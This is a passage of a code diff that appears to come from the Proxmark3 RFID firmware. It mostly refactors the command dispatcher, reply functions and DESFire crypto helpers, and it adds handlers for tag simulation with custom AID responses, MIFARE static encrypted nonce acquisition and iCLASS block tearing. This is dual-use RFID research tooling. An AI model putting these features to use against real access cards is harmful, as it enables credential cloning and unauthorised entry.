                 uint8_t tagtype;
                 uint16_t flags;
                 uint8_t uid[10];
                 uint8_t exitAfter;
+                uint8_t rats[20];
+                bool ulc_p1;
+                bool ulc_p2;
             } PACKED;
             struct p *payload = (struct p *) packet->data.asBytes;
-            SimulateIso14443aTag(payload->tagtype, payload->flags, payload->uid, payload->exitAfter);  // ## Simulate iso14443a tag - pass tag type & UID
+            SimulateIso14443aTag(payload->tagtype, payload->flags, payload->uid,
+                                 payload->exitAfter, payload->rats, sizeof(payload->rats),
+                                 payload->ulc_p1, payload->ulc_p2);  // ## Simulate iso14443a tag - pass tag type & UID
+            break;
+        }
+        case CMD_HF_ISO14443A_SIM_AID: {
+            struct p {
+                uint8_t tagtype;
+                uint16_t flags;
+                uint8_t uid[10];
+                uint8_t ats[20];
+                uint8_t aid[30];
+                uint8_t selectaid_response[100];
+                uint8_t getdata_response[100];
+                uint32_t ats_len;
+                uint32_t aid_len;
+                uint32_t selectaid_response_len;
+                uint32_t getdata_response_len;
+            } PACKED;
+            struct p *payload = (struct p *) packet->data.asBytes;
+            // ## Simulate iso14443a tag - pass tag type, UID, ATS, AID, responses
+            SimulateIso14443aTagAID(payload->tagtype, payload->flags, payload->uid,
+                                    payload->ats, payload->ats_len, payload->aid, payload->aid_len,
+                                    payload->selectaid_response, payload->selectaid_response_len,
+                                    payload->getdata_response, payload->getdata_response_len);
             break;
         }
         case CMD_HF_ISO14443A_ANTIFUZZ: {
@@ -1694,7 +1839,7 @@ static void PacketReceived(PacketCommandNG *packet) {
             struct p {
                 bool turn_off_field;
                 uint8_t keyno;
-                uint8_t key[18];
+                uint8_t key[16];
             } PACKED;
             struct p *payload = (struct p *) packet->data.asBytes;
             MifareUL_AES_Auth(payload->turn_off_field, payload->keyno, payload->key);
@@ -1751,7 +1896,7 @@ static void PacketReceived(PacketCommandNG *packet) {
             break;
         }
         case CMD_HF_MIFARE_ACQ_STATIC_ENCRYPTED_NONCES: {
-            MifareAcquireStaticEncryptedNonces(packet->oldarg[0], packet->data.asBytes);
+            MifareAcquireStaticEncryptedNonces(packet->oldarg[0], packet->data.asBytes, true, packet->oldarg[1], packet->oldarg[2]);
             break;
         }
         case CMD_HF_MIFARE_ACQ_NONCES: {
@@ -1812,41 +1957,70 @@ static void PacketReceived(PacketCommandNG *packet) {
             break;
         }
         case CMD_HF_MIFARE_EML_MEMCLR: {
-            MifareEMemClr();
-            reply_ng(CMD_HF_MIFARE_EML_MEMCLR, PM3_SUCCESS, NULL, 0);
+
+            //-----------------------------------------------------------------------------
+            // Work with emulator memory
+            //
+            // Note: we call FpgaDownloadAndGo(FPGA_BITSTREAM_HF) here although FPGA is not
+            // involved in dealing with emulator memory. But if it is called later, it might
+            // destroy the Emulator Memory.
+            //-----------------------------------------------------------------------------
             FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
+
+            // Not only clears the emulator memory,
+            // also sets default MIFARE values for sector trailers.
+            emlClearMem();
+            reply_ng(CMD_HF_MIFARE_EML_MEMCLR, PM3_SUCCESS, NULL, 0);
             break;
         }
         case CMD_HF_MIFARE_EML_MEMSET: {
+            FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
             struct p {
-                uint8_t blockno;
+                uint16_t blockno;
                 uint8_t blockcnt;
                 uint8_t blockwidth;
                 uint8_t data[];
             } PACKED;
             struct p *payload = (struct p *) packet->data.asBytes;
 
-            FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
-
             // backwards compat... default bytewidth
-            if (payload->blockwidth == 0)
-                payload->blockwidth = 16;
+            if (payload->blockwidth == 0) {
+                payload->blockwidth = MIFARE_BLOCK_SIZE;
+            }
 
             emlSetMem_xt(payload->data, payload->blockno, payload->blockcnt, payload->blockwidth);
             break;
         }
         case CMD_HF_MIFARE_EML_MEMGET: {
+
+            FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
             struct p {
-                uint8_t blockno;
+                uint16_t blockno;
                 uint8_t blockcnt;
+                uint8_t blockwidth;
             } PACKED;
             struct p *payload = (struct p *) packet->data.asBytes;
-            MifareEMemGet(payload->blockno, payload->blockcnt);
+
+            //
+            size_t size = payload->blockcnt * payload->blockwidth;
+            if (size > PM3_CMD_DATA_SIZE) {
+                reply_ng(CMD_HF_MIFARE_EML_MEMGET, PM3_EMALLOC, NULL, 0);
+                return;
+            }
+
+            uint8_t *buf = BigBuf_calloc(size);
+
+            emlGetMem_xt(buf, payload->blockno, payload->blockcnt, payload->blockwidth); // data, block num, blocks count (max 4)
+
+            LED_B_ON();
+            reply_ng(CMD_HF_MIFARE_EML_MEMGET, PM3_SUCCESS, buf, size);
+            LED_B_OFF();
+            BigBuf_free_keep_EM();
             break;
         }
         case CMD_HF_MIFARE_EML_LOAD: {
             mfc_eload_t *payload = (mfc_eload_t *) packet->data.asBytes;
-            MifareECardLoadExt(payload->sectorcnt, payload->keytype);
+            MifareECardLoadExt(payload->sectorcnt, payload->keytype, payload->key);
             break;
         }
         // Gen1a / 1b - "magic Chinese" card
@@ -2085,6 +2259,10 @@ static void PacketReceived(PacketCommandNG *packet) {
             iclass_credit_epurse((iclass_credit_epurse_t *)packet->data.asBytes);
             break;
         }
+        case CMD_HF_ICLASS_TEARBL: {
+            iClass_TearBlock((iclass_tearblock_req_t *)packet->data.asBytes);
+            break;
+        }
 #endif
 
 #ifdef WITH_HFSNIFF
@@ -2181,11 +2359,11 @@ static void PacketReceived(PacketCommandNG *packet) {
         }
 
         case CMD_HF_SAM_PICOPASS: {
-            sam_picopass_get_pacs();
+            sam_picopass_get_pacs(packet);
             break;
         }
         case CMD_HF_SAM_SEOS: {
-//            sam_seos_get_pacs();
+            sam_seos_get_pacs(packet);
             break;
         }
 
@@ -2213,7 +2391,7 @@ static void PacketReceived(PacketCommandNG *packet) {
 
             uint16_t available;
             uint16_t pre_available = 0;
-            uint8_t *dest = BigBuf_malloc(USART_FIFOLEN);
+            uint8_t *dest = BigBuf_calloc(USART_FIFOLEN);
             uint32_t wait = payload->waittime;
 
             StartTicks();
@@ -2257,7 +2435,7 @@ static void PacketReceived(PacketCommandNG *packet) {
 
             uint16_t available;
             uint16_t pre_available = 0;
-            uint8_t *dest = BigBuf_malloc(USART_FIFOLEN);
+            uint8_t *dest = BigBuf_calloc(USART_FIFOLEN);
             uint32_t wait = payload->waittime;
 
             StartTicks();
@@ -2553,9 +2731,9 @@ static void PacketReceived(PacketCommandNG *packet) {
 
             uint32_t size = packet->oldarg[1];
 
-            uint8_t *buff = BigBuf_malloc(size);
+            uint8_t *buff = BigBuf_calloc(size);
             if (buff == NULL) {
-                if (g_dbglevel >= DBG_DEBUG) Dbprintf("Could not allocate buffer");
+                if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
                 // Trigger a finish downloading signal with an PM3_EMALLOC
                 reply_ng(CMD_SPIFFS_DOWNLOAD, PM3_EMALLOC, NULL, 0);
             } else {
@@ -2685,6 +2863,7 @@ static void PacketReceived(PacketCommandNG *packet) {
 
             uint8_t *em = BigBuf_get_EM_addr();
             if (em == NULL) {
+                if (g_dbglevel >= DBG_DEBUG) Dbprintf("Failed to allocate memory");
                 reply_ng(CMD_SPIFFS_ELOAD, PM3_EMALLOC, NULL, 0);
                 LED_B_OFF();
                 break;
@@ -2721,28 +2900,10 @@ static void PacketReceived(PacketCommandNG *packet) {
                 break;
             }
 
-            if (payload->startidx == DEFAULT_T55XX_KEYS_OFFSET) {
+            if (payload->startidx == FLASH_MEM_SIGNATURE_OFFSET_P(spi_flash_pages64k)) {
                 Flash_CheckBusy(BUSY_TIMEOUT);
                 Flash_WriteEnable();
-                Flash_Erase4k(3, 0xC);
-            } else if (payload->startidx ==  DEFAULT_MF_KEYS_OFFSET) {
-                Flash_CheckBusy(BUSY_TIMEOUT);
-                Flash_WriteEnable();
-                Flash_Erase4k(3, 0x8);
-                Flash_CheckBusy(BUSY_TIMEOUT);
-                Flash_WriteEnable();
-                Flash_Erase4k(3, 0x9);
-                Flash_CheckBusy(BUSY_TIMEOUT);
-                Flash_WriteEnable();
-                Flash_Erase4k(3, 0xA);
-            } else if (payload->startidx == DEFAULT_ICLASS_KEYS_OFFSET) {
-                Flash_CheckBusy(BUSY_TIMEOUT);
-                Flash_WriteEnable();
-                Flash_Erase4k(3, 0xB);
-            } else if (payload->startidx == FLASH_MEM_SIGNATURE_OFFSET) {
-                Flash_CheckBusy(BUSY_TIMEOUT);
-                Flash_WriteEnable();
-                Flash_Erase4k(3, 0xF);
+                Flash_Erase4k(spi_flash_pages64k - 1, 0xF);
             }
 
             uint16_t res = Flash_Write(payload->startidx, payload->data, payload->len);
@@ -2762,7 +2923,7 @@ static void PacketReceived(PacketCommandNG *packet) {
                 LED_B_OFF();
                 break;
             }
-            if (page < 3) {
+            if (page < spi_flash_pages64k - 1) {
                 isok = Flash_WipeMemoryPage(page);
                 // let spiffs check and update its info post flash erase
                 rdv40_spiffs_check();
@@ -2775,7 +2936,7 @@ static void PacketReceived(PacketCommandNG *packet) {
         case CMD_FLASHMEM_DOWNLOAD: {
 
             LED_B_ON();
-            uint8_t *mem = BigBuf_malloc(PM3_CMD_DATA_SIZE);
+            uint8_t *mem = BigBuf_calloc(PM3_CMD_DATA_SIZE);
             uint32_t startidx = packet->oldarg[0];
             uint32_t numofbytes = packet->oldarg[1];
             // arg0 = startindex
@@ -2807,9 +2968,9 @@ static void PacketReceived(PacketCommandNG *packet) {
         case CMD_FLASHMEM_INFO: {
 
             LED_B_ON();
-            rdv40_validation_t *info = (rdv40_validation_t *)BigBuf_malloc(sizeof(rdv40_validation_t));
+            rdv40_validation_t *info = (rdv40_validation_t *)BigBuf_calloc(sizeof(rdv40_validation_t));
 
-            bool isok = Flash_ReadData(FLASH_MEM_SIGNATURE_OFFSET, info->signature, FLASH_MEM_SIGNATURE_LEN);
+            bool isok = Flash_ReadData(FLASH_MEM_SIGNATURE_OFFSET_P(spi_flash_pages64k), info->signature, FLASH_MEM_SIGNATURE_LEN);
 
             if (FlashInit()) {
                 Flash_UniqueID(info->flashid);
@@ -2818,6 +2979,23 @@ static void PacketReceived(PacketCommandNG *packet) {
             reply_mix(CMD_ACK, isok, 0, 0, info, sizeof(rdv40_validation_t));
             BigBuf_free();
 
+            LED_B_OFF();
+            break;
+        }
+        case CMD_FLASHMEM_PAGES64K: {
+
+            LED_B_ON();
+
+            bool isok = false;
+            if (FlashInit()) {
+                isok = true;
+                if (g_dbglevel >= DBG_DEBUG) {
+                    Dbprintf("  CMD_FLASHMEM_PAGE64K 0x%02x (%d 64k pages)", spi_flash_pages64k, spi_flash_pages64k);
+                }
+                FlashStop();
+            }
+            reply_mix(CMD_ACK, isok, 0, 0, &spi_flash_pages64k, sizeof(uint8_t));
+
             LED_B_OFF();
             break;
         }

armsrc/cmd.c

@@ -72,7 +72,7 @@ int reply_old(uint64_t cmd, uint64_t arg0, uint64_t arg1, uint64_t arg2, const v
     return PM3_SUCCESS;
 }
 
-static int reply_ng_internal(uint16_t cmd, int16_t status, const uint8_t *data, size_t len, bool ng) {
+static int reply_ng_internal(uint16_t cmd, int8_t status, uint8_t reason, const uint8_t *data, size_t len, bool ng) {
     PacketResponseNGRaw txBufferNG;
     size_t txBufferNGLen;
 
@@ -80,6 +80,7 @@ static int reply_ng_internal(uint16_t cmd, int16_t status, const uint8_t *data,
     txBufferNG.pre.magic = RESPONSENG_PREAMBLE_MAGIC;
     txBufferNG.pre.cmd = cmd;
     txBufferNG.pre.status = status;
+    txBufferNG.pre.reason = reason;
     txBufferNG.pre.ng = ng;
     if (len > PM3_CMD_DATA_SIZE) {
         len = PM3_CMD_DATA_SIZE;
@@ -136,12 +137,12 @@ static int reply_ng_internal(uint16_t cmd, int16_t status, const uint8_t *data,
     return PM3_SUCCESS;
 }
 
-int reply_ng(uint16_t cmd, int16_t status, const uint8_t *data, size_t len) {
-    return reply_ng_internal(cmd, status, data, len, true);
+int reply_ng(uint16_t cmd, int8_t status, const uint8_t *data, size_t len) {
+    return reply_ng_internal(cmd, status, PM3_REASON_UNKNOWN, data, len, true);
 }
 
 int reply_mix(uint64_t cmd, uint64_t arg0, uint64_t arg1, uint64_t arg2, const void *data, size_t len) {
-    int16_t status = PM3_SUCCESS;
+    int8_t status = PM3_SUCCESS;
     uint64_t arg[3] = {arg0, arg1, arg2};
     if (len > PM3_CMD_DATA_SIZE - sizeof(arg)) {
         len = PM3_CMD_DATA_SIZE - sizeof(arg);
@@ -153,7 +154,11 @@ int reply_mix(uint64_t cmd, uint64_t arg0, uint64_t arg1, uint64_t arg2, const v
         memcpy(cmddata + sizeof(arg), data, (int)len);
     }
 
-    return reply_ng_internal((cmd & 0xFFFF), status, cmddata, len + sizeof(arg), false);
+    return reply_ng_internal((cmd & 0xFFFF), status, PM3_REASON_UNKNOWN, cmddata, len + sizeof(arg), false);
+}
+
+int reply_reason(uint16_t cmd, int8_t status, int8_t reason, const uint8_t *data, size_t len) {
+    return reply_ng_internal(cmd, status, reason, data, len, true);
 }
 
 static int receive_ng_internal(PacketCommandNG *rx, uint32_t read_ng(uint8_t *data, size_t len), bool usb, bool fpc) {

armsrc/cmd.h

@@ -28,8 +28,9 @@ extern bool g_reply_via_fpc;
 extern bool g_reply_via_usb;
 
 int reply_old(uint64_t cmd, uint64_t arg0, uint64_t arg1, uint64_t arg2, const void *data, size_t len);
-int reply_ng(uint16_t cmd, int16_t status, const uint8_t *data, size_t len);
+int reply_ng(uint16_t cmd, int8_t status, const uint8_t *data, size_t len);
 int reply_mix(uint64_t cmd, uint64_t arg0, uint64_t arg1, uint64_t arg2, const void *data, size_t len);
+int reply_reason(uint16_t cmd, int8_t status, int8_t reason, const uint8_t *data, size_t len);
 int receive_ng(PacketCommandNG *rx);
 
 #endif // _PROXMARK_CMD_H_

armsrc/dbprint.c

@@ -16,7 +16,6 @@
 //-----------------------------------------------------------------------------
 
 #include "dbprint.h"
-
 #include "string.h"
 #include "cmd.h"
 #include "printf.h"
@@ -76,35 +75,34 @@ void Dbprintf(const char *fmt, ...) {
 // prints HEX & ASCII
 void Dbhexdump(int len, const uint8_t *d, bool bAsci) {
 #if DEBUG
-    char ascii[17];
-
     while (len > 0) {
 
         int l = (len > 16) ? 16 : len;
 
-        memcpy(ascii, d, l);
-        ascii[l] = 0;
+        if (bAsci) {
+            char ascii[17];
 
-        // filter safe ascii
-        for (int i = 0; i < l; i++) {
-            if (ascii[i] < 32 || ascii[i] > 126) {
-                ascii[i] = '.';
+            memcpy(ascii, d, l);
+            ascii[l] = 0;
+
+            // filter safe ascii
+            for (int i = 0; i < l; i++) {
+                if (ascii[i] < 32 || ascii[i] > 126) {
+                    ascii[i] = '.';
+                }
             }
-        }
 
-        if (bAsci)
             Dbprintf("%-8s %*D", ascii, l, d, " ");
-        else
+        } else {
             Dbprintf("%*D", l, d, " ");
+        }
 
         len -= 16;
         d += 16;
     }
 #endif
 }
-void print_result(const char *name, const uint8_t *d, size_t
-
-                  n) {
+void print_result(const char *name, const uint8_t *d, size_t n) {
 
     const uint8_t *p = d;
     uint16_t tmp = n & 0xFFF0;

armsrc/desfire_crypto.c

@@ -31,7 +31,7 @@
 #include "crc32.h"
 #include "crc.h"
 #include "crc16.h"        // crc16 ccitt
-#include "printf.h"
+#include "nprintf.h"
 #include "iso14443a.h"
 #include "dbprint.h"
 #include "BigBuf.h"
@@ -65,25 +65,32 @@ void des_decrypt(void *out, const void *in, const void *key) {
     mbedtls_des_crypt_ecb(&ctx, in, out);
 }
 
-void tdes_nxp_receive(const void *in, void *out, size_t length, const void *key, unsigned char iv[8], int keymode) {
-    if (length % 8) return;
-    if (keymode == 2)
-        mbedtls_des3_set2key_dec(&ctx3, key);
-    else
-        mbedtls_des3_set3key_dec(&ctx3, key);
+void tdes_nxp_receive(const void *in, void *out, size_t length, const void *key, uint8_t *iv, int keymode) {
+
+    // must be even blocks of 8 bytes.
+    if (length % 8) {
+        return;
+    }
+
+    if (keymode == 2) {
+        mbedtls_des3_set2key_dec(&ctx3, key);
+    } else {
+        mbedtls_des3_set3key_dec(&ctx3, key);
+    }
 
-    uint8_t i;
     unsigned char temp[8];
     uint8_t *tin = (uint8_t *) in;
     uint8_t *tout = (uint8_t *) out;
 
     while (length > 0) {
+
         memcpy(temp, tin, 8);
 
         mbedtls_des3_crypt_ecb(&ctx3, tin, tout);
 
-        for (i = 0; i < 8; i++)
-            tout[i] = (unsigned char)(tout[i] ^ iv[i]);
+        for (uint8_t i = 0; i < 8; i++) {
+            tout[i] ^= iv[i];
+        }
 
         memcpy(iv, temp, 8);
 
@@ -93,20 +100,26 @@ void tdes_nxp_receive(const void *in, void *out, size_t length, const void *key,
     }
 }
 
-void tdes_nxp_send(const void *in, void *out, size_t length, const void *key, unsigned char iv[8], int keymode) {
-    if (length % 8) return;
-    if (keymode == 2)
-        mbedtls_des3_set2key_enc(&ctx3, key);
-    else
-        mbedtls_des3_set3key_enc(&ctx3, key);
+void tdes_nxp_send(const void *in, void *out, size_t length, const void *key, uint8_t *iv, int keymode) {
+
+    // must be even blocks of 8 bytes.
+    if (length % 8) {
+        return;
+    }
+
+    if (keymode == 2) {
+        mbedtls_des3_set2key_enc(&ctx3, key);
+    } else {
+        mbedtls_des3_set3key_enc(&ctx3, key);
+    }
 
-    uint8_t i;
     uint8_t *tin = (uint8_t *) in;
     uint8_t *tout = (uint8_t *) out;
 
     while (length > 0) {
-        for (i = 0; i < 8; i++) {
-            tin[i] = (unsigned char)(tin[i] ^ iv[i]);
+
+        for (uint8_t i = 0; i < 8; i++) {
+            tin[i] ^= iv[i];
         }
 
         mbedtls_des3_crypt_ecb(&ctx3, tin, tout);
@@ -120,7 +133,9 @@ void tdes_nxp_send(const void *in, void *out, size_t length, const void *key, un
 }
 
 void aes128_nxp_receive(const void *in, void *out, size_t length, const void *key, unsigned char iv[16]) {
-    if (length % 8) return;
+    if (length % 8) {
+        return;
+    }
 
     uint8_t *tin = (uint8_t *) in;
     uint8_t *tout = (uint8_t *) out;
@@ -130,7 +145,9 @@ void aes128_nxp_receive(const void *in, void *out, size_t length, const void *ke
 }
 
 void aes128_nxp_send(const void *in, void *out, size_t length, const void *key, unsigned char iv[16]) {
-    if (length % 8) return;
+    if (length % 8) {
+        return;
+    }
 
     uint8_t *tin = (uint8_t *) in;
     uint8_t *tout = (uint8_t *) out;
@@ -139,12 +156,15 @@ void aes128_nxp_send(const void *in, void *out, size_t length, const void *key,
     mbedtls_aes_crypt_cbc(&actx, MBEDTLS_AES_ENCRYPT, length, iv, tin, tout);
 }
 
-void Desfire_des_key_new(const uint8_t value[8], desfirekey_t key) {
-    uint8_t data[8];
-    memcpy(data, value, 8);
-    for (int n = 0; n < 8; n++) {
+void Desfire_des_key_new(const uint8_t *value, desfirekey_t key) {
+
+    uint8_t data[8] = {0};
+    memcpy(data, value, sizeof(data));
+
+    for (size_t n = 0; n < sizeof(data); n++) {
         data[n] &= 0xFE;
     }
+
     Desfire_des_key_new_with_version(data, key);
 }
 
@@ -233,22 +253,24 @@ void Desfire_key_set_version(desfirekey_t key, uint8_t version) {
 
 void Desfire_session_key_new(const uint8_t rnda[], const uint8_t rndb[], desfirekey_t authkey, desfirekey_t key) {
 
-    uint8_t buffer[24];
+    uint8_t buffer[24] = {0};
 
     switch (authkey->type) {
-        case T_DES:
+        case T_DES: {
             memcpy(buffer, rnda, 4);
             memcpy(buffer + 4, rndb, 4);
             Desfire_des_key_new_with_version(buffer, key);
             break;
-        case T_3DES:
+        }
+        case T_3DES: {
             memcpy(buffer, rnda, 4);
             memcpy(buffer + 4, rndb, 4);
             memcpy(buffer + 8, rnda + 4, 4);
             memcpy(buffer + 12, rndb + 4, 4);
             Desfire_3des_key_new_with_version(buffer, key);
             break;
-        case T_3K3DES:
+        }
+        case T_3K3DES: {
             memcpy(buffer, rnda, 4);
             memcpy(buffer + 4, rndb, 4);
             memcpy(buffer + 8, rnda + 6, 4);
@@ -257,22 +279,15 @@ void Desfire_session_key_new(const uint8_t rnda[], const uint8_t rndb[], desfire
             memcpy(buffer + 20, rndb + 12, 4);
             Desfire_3k3des_key_new(buffer, key);
             break;
-        case T_AES:
+        }
+        case T_AES: {
             memcpy(buffer, rnda, 4);
             memcpy(buffer + 4, rndb, 4);
             memcpy(buffer + 8, rnda + 12, 4);
             memcpy(buffer + 12, rndb + 12, 4);
             Desfire_aes_key_new(buffer, key);
             break;
-    }
-}
-
-static size_t key_macing_length(desfirekey_t key);
-
-// iceman,  see memxor inside string.c, dest/src swapped..
-static void xor(const uint8_t *ivect, uint8_t *data, const size_t len) {
-    for (size_t i = 0; i < len; i++) {
-        data[i] ^= ivect[i];
+        }
     }
 }
 
@@ -293,7 +308,7 @@ void cmac_generate_subkeys(desfirekey_t key) {
     // Used to compute CMAC on complete blocks
     memcpy(key->cmac_sk1, l, kbs);
 
-    txor = l[0] & 0x80;
+    txor = (l[0] & 0x80);
 
     lsl(key->cmac_sk1, kbs);
 
@@ -304,7 +319,7 @@ void cmac_generate_subkeys(desfirekey_t key) {
     // Used to compute CMAC on the last block if non-complete
     memcpy(key->cmac_sk2, key->cmac_sk1, kbs);
 
-    txor = key->cmac_sk1[0] & 0x80;
+    txor = (key->cmac_sk1[0] & 0x80);
 
     lsl(key->cmac_sk2, kbs);
 
@@ -319,7 +334,7 @@ void cmac(const desfirekey_t key, uint8_t *ivect, const uint8_t *data, size_t le
         return;
     }
 
-    uint8_t *buffer = BigBuf_malloc(padded_data_length(len, kbs));
+    uint8_t *buffer = BigBuf_calloc(padded_data_length(len, kbs));
 
     memcpy(buffer, data, len);
 
@@ -328,15 +343,14 @@ void cmac(const desfirekey_t key, uint8_t *ivect, const uint8_t *data, size_t le
         while (len % kbs) {
             buffer[len++] = 0x00;
         }
-        xor(key->cmac_sk2, buffer + len - kbs, kbs);
+        xor(buffer + len - kbs, key->cmac_sk2, kbs);
     } else {
-        xor(key->cmac_sk1, buffer + len - kbs, kbs);
+        xor(buffer + len - kbs, key->cmac_sk1, kbs);
     }
 
     mifare_cypher_blocks_chained(NULL, key, ivect, buffer, len, MCD_SEND, MCO_ENCYPHER);
 
     memcpy(cmac, ivect, kbs);
-    //free(buffer);
 }
 
 size_t key_block_size(const desfirekey_t key) {
@@ -361,7 +375,7 @@ size_t key_block_size(const desfirekey_t key) {
 /*
  * Size of MACing produced with the key.
  */
-static size_t key_macing_length(const desfirekey_t key) {
+size_t key_macing_length(const desfirekey_t key) {
     size_t mac_length = DESFIRE_MAC_LENGTH;
     switch (key->type) {
         case T_DES:
@@ -380,10 +394,11 @@ static size_t key_macing_length(const desfirekey_t key) {
  * Size required to store nbytes of data in a buffer of size n*block_size.
  */
 size_t padded_data_length(const size_t nbytes, const size_t block_size) {
-    if ((!nbytes) || (nbytes % block_size))
+    if ((!nbytes) || (nbytes % block_size)) {
         return ((nbytes / block_size) + 1) * block_size;
-    else
+    } else {
         return nbytes;
+    }
 }
 
 /*
@@ -399,12 +414,14 @@ size_t enciphered_data_length(const desfiretag_t tag, const size_t nbytes, int c
     size_t crc_length = 0;
     if (!(communication_settings & NO_CRC)) {
         switch (DESFIRE(tag)->authentication_scheme) {
-            case AS_LEGACY:
+            case AS_LEGACY: {
                 crc_length = 2;
                 break;
-            case AS_NEW:
+            }
+            case AS_NEW: {
                 crc_length = 4;
                 break;
+            }
         }
     }
 
@@ -415,18 +432,20 @@ size_t enciphered_data_length(const desfiretag_t tag, const size_t nbytes, int c
 
 void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes, size_t offset, int communication_settings) {
     uint8_t *res = data;
-    uint8_t mac[4];
+    uint8_t mac[4] = {0};
     size_t edl;
     bool append_mac = true;
-    desfirekey_t key = DESFIRE(tag)->session_key;
 
-    if (!key)
+    desfirekey_t key = DESFIRE(tag)->session_key;
+    if (!key) {
         return data;
+    }
 
     switch (communication_settings & MDCM_MASK) {
-        case MDCM_PLAIN:
-            if (AS_LEGACY == DESFIRE(tag)->authentication_scheme)
+        case MDCM_PLAIN: {
+            if (AS_LEGACY == DESFIRE(tag)->authentication_scheme) {
                 break;
+            }
 
             /*
              * When using new authentication methods, PLAIN data transmission from
@@ -439,13 +458,16 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
              */
 
             append_mac = false;
-
+        }
         /* pass through */
-        case MDCM_MACED:
+        case MDCM_MACED: {
             switch (DESFIRE(tag)->authentication_scheme) {
-                case AS_LEGACY:
-                    if (!(communication_settings & MAC_COMMAND))
+                case AS_LEGACY: {
+
+                    if (!(communication_settings & MAC_COMMAND)) {
                         break;
+                    }
+
 
                     /* pass through */
                     edl = padded_data_length(*nbytes - offset, key_block_size(DESFIRE(tag)->session_key)) + offset;
@@ -462,8 +484,6 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
                     // Copy again provided data (was overwritten by mifare_cypher_blocks_chained)
                     memcpy(res, data, *nbytes);
 
-                    if (!(communication_settings & MAC_COMMAND))
-                        break;
                     // Append MAC
                     size_t bla = maced_data_length(DESFIRE(tag)->session_key, *nbytes - offset) + offset;
                     (void)bla++;
@@ -472,9 +492,12 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
 
                     *nbytes += 4;
                     break;
-                case AS_NEW:
-                    if (!(communication_settings & CMAC_COMMAND))
+                }
+                case AS_NEW: {
+                    if (!(communication_settings & CMAC_COMMAND)) {
                         break;
+                    }
+
                     cmac(key, DESFIRE(tag)->ivect, res, *nbytes, DESFIRE(tag)->cmac);
 
                     if (append_mac) {
@@ -485,10 +508,11 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
                         *nbytes += DESFIRE_CMAC_LENGTH;
                     }
                     break;
+                }
             }
-
             break;
-        case MDCM_ENCIPHERED:
+        }
+        case MDCM_ENCIPHERED: {
             /*  |<-------------- data -------------->|
              *  |<--- offset -->|                    |
              *  +---------------+--------------------+-----+---------+
@@ -504,8 +528,10 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
              *                            encypher()/decypher()
              */
 
-            if (!(communication_settings & ENC_COMMAND))
+            if (!(communication_settings & ENC_COMMAND)) {
                 break;
+            }
+
             edl = enciphered_data_length(tag, *nbytes - offset, communication_settings) + offset;
 
             // Fill in the crypto buffer with data ...
@@ -513,14 +539,16 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
             if (!(communication_settings & NO_CRC)) {
                 // ... CRC ...
                 switch (DESFIRE(tag)->authentication_scheme) {
-                    case AS_LEGACY:
+                    case AS_LEGACY: {
                         AddCrc14A(res + offset, *nbytes - offset);
                         *nbytes += 2;
                         break;
-                    case AS_NEW:
+                    }
+                    case AS_NEW: {
                         crc32_append(res, *nbytes);
                         *nbytes += 4;
                         break;
+                    }
                 }
             }
             // ... and padding
@@ -530,32 +558,34 @@ void *mifare_cryto_preprocess_data(desfiretag_t tag, void *data, size_t *nbytes,
 
             mifare_cypher_blocks_chained(tag, NULL, NULL, res + offset, *nbytes - offset, MCD_SEND, (AS_NEW == DESFIRE(tag)->authentication_scheme) ? MCO_ENCYPHER : MCO_DECYPHER);
             break;
-        default:
-
+        }
+        default: {
             *nbytes = -1;
             res = NULL;
             break;
+        }
     }
 
     return res;
-
 }
 
 void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes, int communication_settings) {
+
     void *res = data;
-    uint8_t first_cmac_byte = 0x00;
-
-    desfirekey_t key = DESFIRE(tag)->session_key;
-
-    if (!key) {
-        return data;
-    }
 
     // Return directly if we just have a status code.
     if (1 == *nbytes) {
         return res;
     }
 
+
+    desfirekey_t key = DESFIRE(tag)->session_key;
+    if (!key) {
+        return data;
+    }
+
+    uint8_t first_cmac_byte = 0x00;
+
     switch (communication_settings & MDCM_MASK) {
         case MDCM_PLAIN: {
 
@@ -646,11 +676,12 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes
             break;
         }
         case MDCM_ENCIPHERED: {
+
             (*nbytes)--;
+
             bool verified = false;
             int crc_pos = 0x00;
             int end_crc_pos = 0x00;
-            uint8_t x;
 
             /*
              * AS_LEGACY:
@@ -729,8 +760,9 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes
                     verified = true;
                     for (int n = end_crc_pos; n < *nbytes - 1; n++) {
                         uint8_t byte = ((uint8_t *)res)[n];
-                        if (!((0x00 == byte) || ((0x80 == byte) && (n == end_crc_pos))))
+                        if (!((0x00 == byte) || ((0x80 == byte) && (n == end_crc_pos)))) {
                             verified = false;
+                        }
                     }
                 }
 
@@ -755,7 +787,7 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes
                             break;
                         }
                         case AS_NEW: {
-                            x = ((uint8_t *)res)[crc_pos - 1];
+                            uint8_t x = ((uint8_t *)res)[crc_pos - 1];
                             ((uint8_t *)res)[crc_pos - 1] = ((uint8_t *)res)[crc_pos];
                             ((uint8_t *)res)[crc_pos] = x;
                             break;
@@ -789,9 +821,10 @@ void *mifare_cryto_postprocess_data(desfiretag_t tag, void *data, size_t *nbytes
 
 
 void mifare_cypher_single_block(desfirekey_t key, uint8_t *data, uint8_t *ivect, MifareCryptoDirection direction, MifareCryptoOperation operation, size_t block_size) {
+
     uint8_t ovect[DESFIRE_MAX_CRYPTO_BLOCK_SIZE];
     if (direction == MCD_SEND) {
-        xor(ivect, data, block_size);
+        xor(data, ivect, block_size);
     } else {
         memcpy(ovect, data, block_size);
     }
@@ -799,70 +832,80 @@ void mifare_cypher_single_block(desfirekey_t key, uint8_t *data, uint8_t *ivect,
